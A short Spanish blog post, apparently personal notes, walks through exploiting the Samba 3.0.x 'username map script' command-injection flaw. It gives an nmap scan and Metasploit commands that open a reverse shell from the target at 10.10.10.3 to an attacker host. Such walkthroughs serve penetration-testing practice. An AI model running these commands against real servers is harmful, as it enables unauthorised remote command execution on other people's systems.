Exploiting, Hacking

Exploit smbd 3.X

Print Friendly, PDF & Email

Buenas.

Este Post no trae novedades ni descubre américa pero a modo recordatorio sirve.

Como me gusta tener mis apuntes y luego no me acordaré del cve, pues aquí lo dejo para tod@s.

Encontrando la diana

nmap -A -Pn $HOST

Lo que nos da el aviso es:

139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)

La vulnerabilidad explotada con su módulo de metaxploit:

usermap_script

La funcionalidad MS-RPC (Micrososft Remote Procedure Call) en el demonio servidor smbd; el cual proporciona servicios para compartir archivos e impresión a clientes Windows; de Samba desde la versión 3.0.0 hasta la versión 3.0.25rc3 permite a los atacantes remotos la ejecución de comandos arbitrarios mediante metacaracteres shell involucrando la función SamrChangePassword, cuando la opción “username map script” está habilitada en el archivo smb.conf, y permite a los usuarios remotos autenticados ejecutar comandos mediante metacaracteres shell involucrando funciones MS-RPC en la gestión de la impresora remota y archivos compartidos.

Alonso Caballero quezada http://www.reydes.com

El como explotarla:

Si no lo has hecho antes:

msfupdate

Ahora ya actualizad@s al lio:

search samba
use exploit/multi/samba/usermap_script
set RHOST 10.10.10.3
set PAYLOAD cmd/unix/reverse
set LHOST 10.10.1.2
exploit

Y…: Done!

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *